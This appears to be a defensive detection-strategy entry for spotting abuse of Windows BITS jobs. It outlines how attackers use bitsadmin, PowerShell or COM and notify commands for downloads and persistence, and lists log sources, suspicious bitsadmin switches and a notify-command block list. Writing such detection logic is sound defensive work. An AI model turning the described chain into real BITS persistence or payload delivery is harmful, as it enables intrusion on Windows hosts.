Behavioral chain: (1) An actor creates or modifies a BITS job via bitsadmin.exe, PowerShell BITS cmdlets, or COM; (2) the job performs HTTP(S)/SMB network transfers while the owning user is logged on; (3) upon job completion/error, BITS launches a notify command (SetNotifyCmdLine) from svchost.exe -k netsvcs -s BITS, often establishing persistence by keeping long-lived jobs. The strategy correlates process creation, command/script telemetry, BITS-Client operational events, and network connections initiated by BITS.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | WinEventLog:Security | EventCode=4688 |
| Network Connection Creation (DC0082) | WinEventLog:Sysmon | EventCode=3 |
| Command Execution (DC0064) | WinEventLog:PowerShell | EventCode=4103,4104 |
| Service Creation (DC0060) | WinEventLog:System | EventCode=7036 |
| Field | Description |
|---|---|
| TimeWindow | Correlation window linking job creation, transfer, and notify execution (e.g., 30m–24h depending on environment and BITS retry behavior). |
| ExpectedUpdateHosts | Allow-list of corporate update/CDN endpoints that legitimately use BITS (WSUS, MEMCM, vendor updaters). |
| SuspiciousCliSwitches | BITSAdmin flags of interest (/transfer, /addfile, /SetNotifyCmdLine, /resume, /setcustomheaders, /setminretrydelay). |
| NotifyCmdBlockList | Known risky binaries or folders (e.g., %TEMP%\*.exe, powershell.exe, cmd.exe) used as BITS notify commands. |
| UserContext | Scope by interactive users, service accounts, or high-value targets (admins/servers) to reduce benign noise. |
| ExternalNetCIDRs | Definition of external/non-corp destinations for network correlation. |
| JobLifetimeThreshold | Maximum age or retry count for benign jobs before flagging persistence (e.g., >3 days or retry>20). |